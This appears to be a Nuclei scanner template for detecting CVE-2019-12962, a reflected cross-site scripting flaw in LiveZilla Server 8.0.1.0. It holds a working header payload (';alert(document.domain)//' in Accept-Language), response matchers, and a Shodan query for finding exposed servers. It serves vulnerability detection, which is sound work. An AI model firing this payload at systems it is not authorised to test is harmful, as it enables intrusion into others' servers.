46 lines
1008 B
YAML
46 lines
1008 B
YAML
id: CVE-2019-12962
|
|
|
|
info:
|
|
name: LiveZilla Server 8.0.1.0 - Cross Site Scripting
|
|
author: Clment Cruchet
|
|
severity: medium
|
|
description: |
|
|
LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/49669
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-12962
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.10
|
|
cve-id: CVE-2019-12962
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: true
|
|
shodan-query: http.html:LiveZilla
|
|
tags: cve,cve2019,livezilla,xss
|
|
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/mobile/index.php'
|
|
|
|
headers:
|
|
Accept-Language: ';alert(document.domain)//'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "var detectedLanguage = ';alert(document.domain)//';"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|